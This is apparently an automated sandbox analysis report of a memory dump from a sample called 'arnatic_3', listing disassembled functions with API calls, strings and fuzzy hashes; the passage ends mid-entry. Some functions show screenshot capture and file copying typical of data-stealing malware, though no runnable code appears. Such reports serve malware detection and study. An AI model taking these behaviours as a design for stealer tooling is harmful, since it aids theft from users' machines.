API ID: _memmove$AllocH_prolog3_Local_memset
String ID: NULL$v10
API String ID: 1135815740-1391045996
Opcode ID: 1c8e3e98345e74192d32fca66c7f8dce367db6a6c2bf15e2c28b433a49e38e22
Instruction ID: bfc7ffdac06d505237023a529ca962de6a86fec08b3f93c20df94ea107530783
Opcode Fuzzy Hash: 1c8e3e98345e74192d32fca66c7f8dce367db6a6c2bf15e2c28b433a49e38e22
Instruction Fuzzy Hash: BA417FB0900218ABDF14DFA5DD95BEEBBB9FF84304F10042EF401AB282D7B99950CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C35B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0041E17B: _memset.LIBCMT ref: 0041E198

__fprintf_l.LIBCMT ref: 0042C3A3
__aulldiv.LIBCMT ref: 0042C3DD
__fprintf_l.LIBCMT ref: 0042C3EC

Strings

%llu, xrefs: 0042C3E4
%llu, xrefs: 0042C39B

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$__aulldiv_memset
String ID: %llu$%llu
API String ID: 2327972778-4283164361
Opcode ID: 9308e657d716a95936c650b0402fec2fa746cc1a7488d6bbd76057bdfeeacd24
Instruction ID: 19674fd1ddc34529304bec5b3f03af833aa0b079c4aef0c88eb3299126e427d0
Opcode Fuzzy Hash: 9308e657d716a95936c650b0402fec2fa746cc1a7488d6bbd76057bdfeeacd24
Instruction Fuzzy Hash: 0821E571700704BFDB10BA95DCC2EAF37AADF84324F54852EF81197381DA78AD819669

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC57, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0041ECFE
__fprintf_l.LIBCMT ref: 0041ED13

Strings

OsError 0x%lx (%lu), xrefs: 0041ECF3
(dF, xrefs: 0041ECC0
.dF, xrefs: 0041EC88

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l
String ID: (dF$.dF$OsError 0x%lx (%lu)
API String ID: 3906573944-3796761947
Opcode ID: ed5323bf5ccdcece45c3bcc0e8c8a9ff10adec1b71340a8089ac41999c3d2c11
Instruction ID: a4f1ca36c3f10a511ce915aa20a7cd09191d830274b8aa2afdae3ba9322ec28d
Opcode Fuzzy Hash: ed5323bf5ccdcece45c3bcc0e8c8a9ff10adec1b71340a8089ac41999c3d2c11
Instruction Fuzzy Hash: D221A175900118BBCB117BA7ED45CDF7F7AEF54394B104067F905A2111EB384A81DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 00460875, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0046088C

Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 004664DC
Part of subcall function 004664C7: __CxxThrowException@8.LIBCMT ref: 004664F1
Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 00466502

std::_Xinvalid_argument.LIBCPMT ref: 004608A2
_memmove.LIBCMT ref: 004608E3

Strings

invalid string position, xrefs: 00460887
string too long, xrefs: 0046089D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 711f992d38f09cc9778881d917e8fd9a3701cf528c8a63d8e2b154cf44e10244
Instruction ID: 534a1d24c916d95ed197886380ed3dd1ad2077ffbcbee5f5e76dd2826a11975e
Opcode Fuzzy Hash: 711f992d38f09cc9778881d917e8fd9a3701cf528c8a63d8e2b154cf44e10244
Instruction Fuzzy Hash: D811B9713002449BDB24AE5DCC81A2FB7AAEF81714B14091FF49297682E778D844879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA34, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CA4B

Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 004664DC
Part of subcall function 004664C7: __CxxThrowException@8.LIBCMT ref: 004664F1
Part of subcall function 004664C7: std::exception::exception.LIBCMT ref: 00466502

std::_Xinvalid_argument.LIBCPMT ref: 0040CA6D
_memmove.LIBCMT ref: 0040CAB1

Strings

invalid string position, xrefs: 0040CA46
string too long, xrefs: 0040CA68

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: d02874560f93722ddbe5d688efe4ad1403716b08115e9b6cf686e663a5b9afb8
Instruction ID: e8c142e10b28b21ab76b05c72e01e2a91224282b2b3092023f8eaf2343c48f51
Opcode Fuzzy Hash: d02874560f93722ddbe5d688efe4ad1403716b08115e9b6cf686e663a5b9afb8
Instruction Fuzzy Hash: 8211B631300609DBCB14EF58C8C1E5AB3AAAF857147214A2EF815A72D1EB34E9458A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00410053, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00410072
std::exception::exception.LIBCMT ref: 00410094

Strings

ios_base::badbit set, xrefs: 00410086
ios_base::eofbit set, xrefs: 004100CC
ios_base::failbit set, xrefs: 004100BC

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 3302f4c1b229d10cdc862e76f4afeb26e0d1fc75cf0b6c73dac252abe183259b
Instruction ID: 5228d8cf70b92e8a98e2f8c14672eb719efc7e608d5efe411c6b11b73716c320
Opcode Fuzzy Hash: 3302f4c1b229d10cdc862e76f4afeb26e0d1fc75cf0b6c73dac252abe183259b
Instruction Fuzzy Hash: 2201B5B15002089ACB40FF69C5057EE7BE4AB04358F94C41FA845D7201EBBCCA858B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00460012, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0046001A

Part of subcall function 0046948E: __FF_MSGBANNER.LIBCMT ref: 004694A7
Part of subcall function 0046948E: __NMSG_WRITE.LIBCMT ref: 004694AE
Part of subcall function 0046948E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004694D3

GetTickCount.KERNEL32 ref: 00460025

Part of subcall function 0046B2C8: __getptd.LIBCMT ref: 0046B2CD

_rand.LIBCMT ref: 0046003A

Part of subcall function 0046B2DA: __getptd.LIBCMT ref: 0046B2DA

_sprintf.LIBCMT ref: 0046004D

Strings

%s%d, xrefs: 00460047

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: e2bba96784d5fccc3a1c5e425a4c61172d5d2bca5e73b78b5ce0e472bd765503
Instruction ID: 784bc9298c92276b589aa04d9fd0d27cd22202501dc46456067e8ab4d68bdf3f
Opcode Fuzzy Hash: e2bba96784d5fccc3a1c5e425a4c61172d5d2bca5e73b78b5ce0e472bd765503
Instruction Fuzzy Hash: 9DE05C622082515AD31266E96C45B3F968CDFD2364F20045FF10486181FAAC8C0043AB

Uniqueness

Uniqueness Score: -1.00%

Function 00460221, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00460244
GetSystemMetrics.USER32(00000000), ref: 0046024A
GetSystemMetrics.USER32(00000001), ref: 00460254

Part of subcall function 004601B3: SelectObject.GDI32(00000000,00000000), ref: 004601DC
Part of subcall function 004601B3: DeleteObject.GDI32(00000000), ref: 00460214

GdiplusShutdown.GDIPLUS(?), ref: 0046026E

Strings

screenshot.jpg, xrefs: 0046025A

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: GdiplusMetricsObjectSystem$DeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 654883086-673422685
Opcode ID: 39d2d1d6bfa765c07d3efe55b63c172300a0e84362f8c2b9a6388b0ccab00e7e
Instruction ID: b2a7e6941e111f2eed788eccc8244488dc82622244db7ccb1e33522de6b22b5f
Opcode Fuzzy Hash: 39d2d1d6bfa765c07d3efe55b63c172300a0e84362f8c2b9a6388b0ccab00e7e
Instruction Fuzzy Hash: B5F0DAB2901229BACB11ABD69D45ADFBB7CEF0575CF100166F501A2142E7B55A008BF6

Uniqueness

Uniqueness Score: -1.00%

Function 0046CF6E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0046CF8F

Part of subcall function 0047029D: __getptd_noexit.LIBCMT ref: 004702A0
Part of subcall function 0047029D: __amsg_exit.LIBCMT ref: 004702AD

__getptd.LIBCMT ref: 0046CFA0
__getptd.LIBCMT ref: 0046CFAE

Strings

RCC, xrefs: 0046CF7A
MOC, xrefs: 0046CF81

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC
API String ID: 803148776-2084237596
Opcode ID: 816156e734fd08fdfc8d28061f99b72a763ba6cb62318ab8264eea60bfdcfa10
Instruction ID: 7ed34c47205de74805ecdd2f6c3a7370fd7258170a3247336c41834b11f9e10b
Opcode Fuzzy Hash: 816156e734fd08fdfc8d28061f99b72a763ba6cb62318ab8264eea60bfdcfa10
Instruction Fuzzy Hash: 1EE06D31110104CEC714A764908E7BA33E1AF48318F5944E3E44CCB363D72CDD40594B

Uniqueness

Uniqueness Score: -1.00%

Function 0046433A, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0046438E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004643C8

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: b44c455b5e18463697c8017b6e0e523205bc16590cb85e3be49756e8081e4ce2
Instruction ID: 1cdc2c1d8a4ec812139995a4dd63e7721ad8dd20cd7cdd3c2fe7a9cf395a3bf6
Opcode Fuzzy Hash: b44c455b5e18463697c8017b6e0e523205bc16590cb85e3be49756e8081e4ce2
Instruction Fuzzy Hash: BD3180B06007049FDF308F25C885B277AE8FB95755F108A3FF19686A40E778AD858F5A

Uniqueness

Uniqueness Score: -1.00%

Function 004724F6, Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00472502

Part of subcall function 0047029D: __getptd_noexit.LIBCMT ref: 004702A0
Part of subcall function 0047029D: __amsg_exit.LIBCMT ref: 004702AD

__getptd.LIBCMT ref: 00472519
__amsg_exit.LIBCMT ref: 00472527
__lock.LIBCMT ref: 00472537
__updatetlocinfoEx_nolock.LIBCMT ref: 0047254B

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4c34051a4e86ec7735a756a2dfabd345cdcb6d727fc0a3370cded566c40fb2d1
Instruction ID: f0fc2cb405e493343997f04e4ddbb755695f9bc1e37fac64c9f23c8a867ac7f2
Opcode Fuzzy Hash: 4c34051a4e86ec7735a756a2dfabd345cdcb6d727fc0a3370cded566c40fb2d1
Instruction Fuzzy Hash: 09F09672D41300EAEB21BB6AAA1678E37E06F04728F50C19FF558672C3DBAC5940965E

Uniqueness

Uniqueness Score: -1.00%

Function 0046AE09, Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0046E216: _doexit.LIBCMT ref: 0046E222

___set_flsgetvalue.LIBCMT ref: 0046AE1B

Part of subcall function 004700E2: TlsGetValue.KERNEL32(00000001,0047023B,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004700EB
Part of subcall function 004700E2: DecodePointer.KERNEL32(?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 004700FD
Part of subcall function 004700E2: TlsSetValue.KERNEL32(00000000,?,?,00467630,00000001,00000000,?,?,?,0046768E,00402DA3), ref: 0047010C

___fls_getvalue@4.LIBCMT ref: 0046AE26

Part of subcall function 004700C2: TlsGetValue.KERNEL32(?,?,0046AE2B,00000000), ref: 004700D0

___fls_setvalue@8.LIBCMT ref: 0046AE39

Part of subcall function 00470116: DecodePointer.KERNEL32(?,?,?,0046AE3E,00000000,?,00000000), ref: 00470127

GetLastError.KERNEL32(00000000,?,00000000), ref: 0046AE42
ExitThread.KERNEL32 ref: 0046AE49
GetCurrentThreadId.KERNEL32 ref: 0046AE4F
__freefls@4.LIBCMT ref: 0046AE6F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 724e79e0c69c32d251c10ba1002562656be7021b015c08b1beb83b4b931d86d4
Instruction ID: 70b4eeaee26be022ee14f0bb6625e7e2b5d2b533592a52da5183b5a9311c453f
Opcode Fuzzy Hash: 724e79e0c69c32d251c10ba1002562656be7021b015c08b1beb83b4b931d86d4
Instruction Fuzzy Hash: C0E04F31842245E78B103BF3EC0AADF3A6C9D00718B10841ABA18B3513EA2E9A1146AF

Uniqueness

Uniqueness Score: -1.00%

Function 00460EF9, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 399COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00460F03

Part of subcall function 0040E8A3: std::locale::facet::_Incref.LIBCPMT ref: 0040E8B6

Part of subcall function 00460A7B: __EH_prolog3.LIBCMT ref: 00460A82
Part of subcall function 00460A7B: std::_Lockit::_Lockit.LIBCPMT ref: 00460A8C
Part of subcall function 00460A7B: int.LIBCPMT ref: 00460AA3
Part of subcall function 00460A7B: std::locale::_Getfacet.LIBCPMT ref: 00460AAC

_localeconv.LIBCMT ref: 00460FAB
_strcspn.LIBCMT ref: 004610B3

Strings

e, xrefs: 00460FBD

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: GetfacetH_prolog3H_prolog3_IncrefLockitLockit::__localeconv_strcspnstd::_std::locale::_std::locale::facet::_
String ID: e
API String ID: 3634193280-4024072794
Opcode ID: 5961a708b1a6d11eb1062e049570fb7f5717c75b231bb32e1243f8cb61bbd18e
Instruction ID: 7e08dd0cbccaeebe83b6c41918aa4f6af66ae3cf06093aeb3c439a727a8e4d2c
Opcode Fuzzy Hash: 5961a708b1a6d11eb1062e049570fb7f5717c75b231bb32e1243f8cb61bbd18e
Instruction Fuzzy Hash: D8025571D00249AFDF11DFE4C981AEEBBB5FF08304F04806AE905AB262E7359A55CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0044C65C, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044C6E9

Strings

no such savepoint: %s, xrefs: 0044C785
cannot open savepoint - SQL statements in progress, xrefs: 0044C67E
cannot release savepoint - SQL statements in progress, xrefs: 0044C7B0

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s
API String ID: 4104443479-3151731220
Opcode ID: dbb8bb078b748d66b7b30c8b1bf568127b1fc33490a20c67123af92c5aada721
Instruction ID: 9c4122b0a704dc6a22abbff0bc36e3ee5c043978cc36ddb001313f8071049d10
Opcode Fuzzy Hash: dbb8bb078b748d66b7b30c8b1bf568127b1fc33490a20c67123af92c5aada721
Instruction Fuzzy Hash: 49D14B71A0071ADFEB64CF69C881B9AB7B1FF44314F24416AE859AB342D734A981CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0043212F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 208COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00432178

Strings

winOpen, xrefs: 004322A1
psow, xrefs: 0043234F
LdF, xrefs: 0043225F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memset
String ID: LdF$psow$winOpen
API String ID: 2102423945-3903942933
Opcode ID: 078352fdb6b76a57bff5c26be37cd32250e81f6fd5f50a825f7159bba2a1c3d6
Instruction ID: 69f01465b2a0269219c29db9c15237135f246a35160cef8e7f02deac5626e4ea
Opcode Fuzzy Hash: 078352fdb6b76a57bff5c26be37cd32250e81f6fd5f50a825f7159bba2a1c3d6
Instruction Fuzzy Hash: DA717D71E0021AABDF10DFA5DE426DEBBB1FB08324F10556BE910B7290D7B89D50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00456045, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00424065: _memset.LIBCMT ref: 00424084

_memmove.LIBCMT ref: 00456140

Strings

sqlite_altertab_%s, xrefs: 00456112
Cannot add a column to a view, xrefs: 00456095
virtual tables may not be altered, xrefs: 0045607F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove_memset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3555123492-2063813899
Opcode ID: 6877136005c2672ae8b622ca76ed929afa16e62aa223d13043eb37dbee43f7a0
Instruction ID: 64550aee36c21fd63e68d695465d3f18315b839d4b1c27dd885bb9f1b7674741
Opcode Fuzzy Hash: 6877136005c2672ae8b622ca76ed929afa16e62aa223d13043eb37dbee43f7a0
Instruction Fuzzy Hash: 1451AD72A00615AFDB10DF69D8417A9BBF0FF08315F51806BEC04DB682EB79E950CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042A411, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A454
_memmove.LIBCMT ref: 0042A46C

Strings

winWrite2, xrefs: 0042A519
winWrite1, xrefs: 0042A568

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: winWrite1$winWrite2
API String ID: 4104443479-3457389245
Opcode ID: 0e06c1f59e3c128ed1f4c03b17ecd8f597c24a7c9c8337e53f90463b258396ef
Instruction ID: 3e7e7ff63b25fac02eecd52d38eedd44d6bb4f3d41f6212ab6afab92fee266f0
Opcode Fuzzy Hash: 0e06c1f59e3c128ed1f4c03b17ecd8f597c24a7c9c8337e53f90463b258396ef
Instruction Fuzzy Hash: B841A071B00219EFCF00DF94D88569E77B5FF04354F68852AEC04A7241D778DEA58B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00430D1B, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00430DC8

Strings

AND , xrefs: 00430DAF
ANY(%s), xrefs: 00430DBE
rowid, xrefs: 00430D7E, 00430D99, 00430DEB, 00430E04, 00430E24, 00430E3D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l
String ID: AND $ANY(%s)$rowid
API String ID: 3906573944-2531995277
Opcode ID: 284d16ad37cb4f342ed815d84e78d19d09fdb2402cff59621d747148ab404788
Instruction ID: da04e987a01bb410f47faae806b6f60d81ec5d19234905543af953c3e027246e
Opcode Fuzzy Hash: 284d16ad37cb4f342ed815d84e78d19d09fdb2402cff59621d747148ab404788
Instruction Fuzzy Hash: C341C435A00214BBCB10AF95C892AAD77F4EF48714F10949BFC45AB291E778EE40C798

Uniqueness

Uniqueness Score: -1.00%

Function 00428B07, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 004158B5: __allrem.LIBCMT ref: 004158DE

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BAB
__localtime64_s.LIBCMT ref: 00428BCE

Strings

utc, xrefs: 00428B21
local time unavailable, xrefs: 00428BDB

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__localtime64_s
String ID: local time unavailable$utc
API String ID: 1840914312-1312764671
Opcode ID: a0072a525d5d5eb0d746f5183a65cfae9e3b81070dc4f1e6f2ca94f064627f46
Instruction ID: 3503791f3d2eadfbdc013cf2dff3f482d01d8f5d6c525ad7d0886de99f69a884
Opcode Fuzzy Hash: a0072a525d5d5eb0d746f5183a65cfae9e3b81070dc4f1e6f2ca94f064627f46
Instruction Fuzzy Hash: BC4124B2A00208DFCF04DF69D8819DE7BE4FF48354F50412AF919A7251DB75E995CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A335
_memmove.LIBCMT ref: 0042A352
_memset.LIBCMT ref: 0042A3FB

Strings

winRead, xrefs: 0042A3D3

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove$_memset
String ID: winRead
API String ID: 1357608183-2759563040
Opcode ID: 9388011d1ed72d9c2518b09c185d26473d9354ee9fe9a8dcc871784ff0ad3abb
Instruction ID: cb45cdd7f8c87468e8830a8d27b46e2d20e7295abf3fc396efefc5c04830d662
Opcode Fuzzy Hash: 9388011d1ed72d9c2518b09c185d26473d9354ee9fe9a8dcc871784ff0ad3abb
Instruction Fuzzy Hash: C3315B72A0021ADBCF04DF69ED8699E37B5EF44314B544026FD00DB241D738EE658BEA

Uniqueness

Uniqueness Score: -1.00%

Function 0042A57E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042A5AA

Strings

winSeekFile, xrefs: 0042A600
winTruncate2, xrefs: 0042A655
winTruncate1, xrefs: 0042A61F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 885266447-2471937615
Opcode ID: d021ce1d9dea3c2338f258035cde065d675138bf95be31cc7300de925fbab3e6
Instruction ID: 51264673dbf133457bc3240db0657f2e08edb15639ad131c6dbcd1206a6fc19e
Opcode Fuzzy Hash: d021ce1d9dea3c2338f258035cde065d675138bf95be31cc7300de925fbab3e6
Instruction Fuzzy Hash: 0A31B271700304AFDB24DF64E881A6B77E5EB44754F58892EFA46CB780D739E8108B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0045ECEA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 0045ECFC
IsWow64Process.KERNEL32(00000000), ref: 0045ED03

Strings

x86, xrefs: 0045ED19
x64, xrefs: 0045ED12

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: d1dbc15c065a118c7f288720bcc8e31ffdc947256fc6606320b2a4dc27de5035
Instruction ID: 8c8621d165812ae9595cd5eef8450d103b7ff16d47559e109faa1670e27c76fe
Opcode Fuzzy Hash: d1dbc15c065a118c7f288720bcc8e31ffdc947256fc6606320b2a4dc27de5035
Instruction Fuzzy Hash: BAF08971A01309FFCB149F95894455EBBBCFB04B45B24487FE50193341C2789F089754

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEA4, Relevance: 6.4, APIs: 4, Instructions: 356fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040CEC3
__wgetenv.LIBCMT ref: 0040CF00

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF3D,?,?,?), ref: 0046225D
Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF3D,?,?,?,?), ref: 0046228C

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D121
CopyFileW.KERNEL32(00000000,?,00000001,?,00000000), ref: 0040D23A

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: ByteCharH_prolog3MultiWide$CopyCreateDirectoryFile__wgetenv
String ID:
API String ID: 77913386-0
Opcode ID: b8c53d45bed383c5b6c8b42b4c2dc030553fe1afebdef6c9ee3914f6c2c1dd8a
Instruction ID: 4248329ff0c781eeff238e73015173c685aff2e2447eee6820ea15deb89a8431
Opcode Fuzzy Hash: b8c53d45bed383c5b6c8b42b4c2dc030553fe1afebdef6c9ee3914f6c2c1dd8a
Instruction Fuzzy Hash: 17E14EB280118CEEDB25EFA4DD85EEF777CAF55308F00416AB806A7181DA745B08DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0046A6FD, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046A798
__flush.LIBCMT ref: 0046A7B6
__write.LIBCMT ref: 0046A7DD
